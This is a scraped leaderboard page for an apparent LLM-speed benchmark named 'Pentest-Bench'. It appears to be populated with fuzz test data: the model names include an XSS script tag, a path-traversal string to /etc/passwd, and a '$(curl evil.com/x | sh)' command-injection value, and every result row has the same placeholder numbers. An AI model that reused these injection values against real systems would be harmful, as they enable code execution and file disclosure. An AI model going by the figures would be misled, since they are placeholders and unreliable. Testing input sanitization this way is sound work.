Skip to content
llm-speed
Leaderboard/hardware/pentest-bench

Pentest-Bench — LLM benchmarks

12 workload results across 9 models.

Fastest known config on Pentest-Bench

42.0 decode tok/s

<script>alert(1)</script> via llama.cpp (Q4_K_M) see full run

<script>alert(1)</script>

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_a3ei8og3rkg

victim

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_b-ndu-9uswz

actual-name

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_0heij9dzacw

beforeafter

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr__zyiw9l3_c5

xy

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_2nqkbpdq-dk

a/b/../../etc/passwd

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_8zc2yi4had5

$(curl evil.com/x | sh)

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_kkseorkbdk3

innocent/bin/sh

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_0laxq0naoht

test-model

WorkloadBackendQuantdecode tok/sprefill tok/sTTFTRun
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_1jskg9qv_8b
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_rl-kbwr9chb
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_7z262rwoo08
chat-shortllama.cpp@b9999Q4_K_M42.00tok/s100.0tok/s50.0msr_wd6-1z548j_

Models measured on Pentest-Bench

Common questions about Pentest-Bench

Direct Q&A drawn from the runs above: fastest LLM, supported model classes, backend rankings, quantization guidance.

Read the Pentest-Bench FAQ →